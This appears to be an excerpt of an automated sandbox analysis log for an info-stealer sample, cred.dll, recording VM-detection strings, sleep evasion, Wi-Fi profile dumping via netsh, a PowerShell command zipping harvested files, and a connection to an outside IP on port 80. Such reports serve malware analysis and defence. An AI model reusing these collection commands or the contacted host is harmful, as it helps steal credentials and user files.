    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8342Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1220Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8307
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1216
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7587
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1980
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4692Thread sleep count: 8342 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028Thread sleep count: 1220 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608Thread sleep time: -10145709240540247s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 756Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: rundll32.exe, 00000005.00000003.1645210103.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.00000000031EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000B1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: rundll32.exe, 00000005.00000003.1645633393.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.00000000031AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1645210103.00000000031AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPG
    Source: rundll32.exe, 00000010.00000002.1748097265.00000000032CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ&
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1680276783.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1645210103.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1748097265.00000000032CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
    Source: netsh.exe, 00000006.00000003.1426267443.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000AF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
    Source: netsh.exe, 00000008.00000003.1427038086.0000000001251000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.1497795560.0000000001491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.196.8.37 80Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",#1Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
